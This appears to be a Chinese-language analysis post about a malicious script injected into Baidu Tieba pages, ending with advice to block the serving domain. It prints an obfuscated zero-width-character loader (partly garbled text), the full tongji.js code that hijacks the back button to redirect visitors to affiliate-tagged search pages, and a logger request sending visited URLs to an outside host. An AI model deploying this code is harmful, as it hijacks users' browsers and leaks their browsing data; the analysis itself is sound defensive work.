嬧�嶁�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�屸�嶁�屸�嶁�屸�嶁�屸�屸�屸�嶁�嶁�屸�屸�嶁�屸�嬧�岋豢鈥屸�屸�岋豢鈥嶁�嶁�屸�嶁�嶁�屸�嬶豢鈥嬧�嶁�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥屸�嬧�嶏豢锘库�屸�嶁�嶁�屸�岋豢鈥嬧�嶁�屸�嶏豢锘库�岋豢鈥岋豢鈥嬶豢锘匡豢鈥岋豢鈥嬧�屸�屸�嶁�屸�嬧�嬶豢锘库�屸�屸�嶁�嬧�嶁�岋豢鈥嶁�屸�嬶豢鈥嬧�嬧�嬶豢鈥嬧�屸�嬶豢鈥嬶豢鈥嬧�嶁�屸�嶁�岋豢鈥嶁�嬧�屸�嶏豢鈥屸�嬶豢锘库�屸�屸�嶁�嬧�屸�屸�嶏豢鈥嬧�屸�嶁�嶁�屸�嬧�嶏豢鈥嶁�屸�嶁�嶏豢鈥屸�嶏豢锘库�岋豢鈥屸�屸�屸�嶏豢鈥嬧�屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�岋豢鈥嬧�嶁�屸�嶁�屸�嶁�嬶豢鈥屸�嶏豢鈥嶁�岋豢鈥嶁�嶁�岋豢鈥嶁�嶁�屸�岋豢锘库�屸�嶁�嶁�屸�屸�嶁�屸�嬧�嬶豢锘库�屸�嬧�嶁�屸�嶁�屸�嶁�嬧�嶁�屸�嶁�嬧�屸�屸�嶁�嶁�屸�屸�嶁�屸�嬧�岋豢鈥屸�屸�屸�岋豢锘库�屸�嶁�嶁�屸�屸�嶁�屸�嬧�嬶豢锘库�屸�嬧�嶁�嬧�嶁�嬧�嶏豢鈥嬧�嬧�嶁�嶁�嬧�屸�嶏豢锘库�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�岋豢鈥屸�嶁�屸�屸�岋豢鈥屸�嬧�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�岋豢鈥嬶豢鈥屸�嬧�嬧�嶁�岋豢鈥嶁�屸�屸�屸�屸�嬧�屸�嶁�嬧�屸�屸�嶁�岋豢鈥屸�嬶豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�屸�屸�嶏豢鈥嬶豢鈥嬧�嬧�屸�岋豢鈥屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�岋豢鈥嬧�嬧�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�屸�嬶豢鈥嶁�屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶁�嶁�屸�屸�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�岋豢鈥嬧�嶁�岋豢鈥屸�嬧�屸�嬧�嬧�嶁�屸�嶁�屸�屸�屸�嶁�屸�嶁�屸�嶏豢锘库�岋豢鈥嬧�嶁�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�岋豢鈥屸�嬧�嬧�嶏豢鈥嬧�屸�嶏豢锘库�嬧�嶁�嶁�屸�岋豢锘库�屸�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嬶豢鈥屸�嶁�嶁�嬧�嬧�嶁�嶁�嬧�屸�嶁�屸�屸�嬧�嶁�嶁�屸�岋豢鈥嶏豢鈥岋豢锘库�屸�岋豢锘库�屸�嬧�嶏豢鈥嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�屸�嶁�屸�嬧�嬶豢锘库�屸�嬧�嶁�嬧�嶁�嬧�嶁�嶏豢鈥岋豢鈥岋豢鈥屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�屸�嶏豢鈥嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�屸�嶁�嶁�嬧�屸�嶏豢锘库�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�屸�嶏豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�嬧�嶁�嶏豢鈥嬧�嶁�嬧�嶁�嬧�嶁�屸�嶁�屸�嶁�嶁�嬧�嬶豢锘库�屸�嬧�嶁�嬧�嶁�嬧�嶁�嶏豢鈥屸�嶁�屸�屸�屸�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�屸�屸�屸�屸�屸�屸�嬧�嶁�屸�嬧�嶁�屸�屸�嬧�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥屸�岋豢鈥嬧�嬧�屸�嶏豢锘库�屸�嶏豢鈥嶁�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�岋豢鈥岋豢鈥屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�屸�嶏豢鈥嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�屸�嶁�嶁�嬧�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬶豢鈥嶏豢鈥嬧�嶁�岋豢鈥嬧�嶁�嶁��".replace(/.{4}/g, function(a) {
var rep = {
"鈥�": "00",
"鈥�": "01",
"鈥�": "10",
"锘�": "11"
};
return String.fromCharCode(parseInt(a.replace(/./g, function(a) {
return rep[a]
}), 2))
}))()
counter.js
会创建2个请求。
https://itbaguanan.com/tongji.js
[POST]https://itbaguanan.com/logger.php
其中https://itbaguanan.com/tongji.js
的内容为
!function() {
function n(n, t) {
var c = t.match(new RegExp("(\\?|&)" + n + "=(.*?)(&|$)"));
return c && decodeURIComponent(c[2])
}
try {
var t = ""
, c = document.referrer
, s = 0;
if ("-1" != c.indexOf("m.baidu") ? (s = 1,
(t = n("w", c)) && 0 === t.indexOf("0_10_") && (t = t.slice(5)),
t = (t = t || n("word", c)) || n("wd", c)) : null != c.match(/(m.sj.sm.cn|m.sa.sm.cn|m.yz.sm.cn|m.yz2.sm.cn|m.xm.sm.cn|so.m.sm.cn|yz.m.sm.cn|m.sp.sm.cn)/i) && (s = 2,
t = n("q", c)),
t && c.indexOf("=1023770n") < 0 && -1 == location.hash.indexOf("_bdtx") && 1 == s) {
history.pushState({
page: 1
}, "", location.href + "#_bdtx_");
r = document,
(i = r.currentScript ? r.currentScript.src : r.scripts[r.scripts.length - 1].src).substring(0, i.lastIndexOf("/"));
window.onpopstate = function(n) {
-1 == location.hash.indexOf("_bdtx_") && (location.href = "https://m.baidu.com/s?from=1023770n&word=" + encodeURI(t))
}
} else if (t && c.indexOf("=wm933595") < 0 && -1 == location.hash.indexOf("_bdtx") && 2 == s) {
history.pushState({
page: 1
}, "", location.href + "#_bdtx_");
e = document,
(o = e.currentScript ? e.currentScript.src : e.scripts[e.scripts.length - 1].src).substring(0, o.lastIndexOf("/"));
window.onpopstate = function(n) {
-1 == location.hash.indexOf("_bdtx_") && (location.href = "https://yz.m.sm.cn/s?from=wm933595&q=" + encodeURI(t))
}
}
} catch (n) {}
var e, o, r, i
}();
[POST]https://itbaguanan.com/logger.php
的参数为:
d: tieba.baidu.com
h: http://tieba.baidu.com/f?kw=%E6%96%90%E8%AE%AF
返回内容为
<br />
<b>Notice</b>: Undefined variable: redis in <b>/usr/share/nginx/html/logger.php</b> on line <b>228</b><br />
<br />
<b>Fatal error</b>: Call to a member function select() on a non-object in <b>/usr/share/nginx/html/logger.php</b> on line <b>228</b><br />
如果直接使用get访问,返回
Notice: Undefined offset: 3 in /usr/share/nginx/html/logger.php on line 155
然后不知道是贴吧全局错误拦截还是counter.js
中的XML对象的e.onreadystatechange错误拦截。
浏览器被重定向到:
http://tieba.baidu.com/%3Cbr%20/%3E%0A%3Cb%3ENotice%3C/b%3E:%20Undefined%20variable:%20redis%20in%20%3Cb%3E/usr/share/nginx/html/logger.php%3C/b%3E%20on%20line%20%3Cb%3E228%3C/b%3E%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EFatal%20error%3C/b%3E:%20Call%20to%20a%20member%20function%20select()%20on%20a%20non-object%20in%20%3Cb%3E/usr/share/nginx/html/logger.php%3C/b%3E%20on%20line%20%3Cb%3E228%3C/b%3E%3Cbr%20/%3E%0A
使用urldecode解码
后得到:
http://tieba.baidu.com/<br />
<b>Notice</b>: Undefined variable: redis in <b>/usr/share/nginx/html/logger.php</b> on line <b>228</b><br />
<br />
<b>Fatal error</b>: Call to a member function select() on a non-object in <b>/usr/share/nginx/html/logger.php</b> on line <b>228</b><br />
然后重新定向到贴吧404页面
解决办法,屏蔽http://t.wsgblw.com
域名的方式,使其脚本加载失败即可。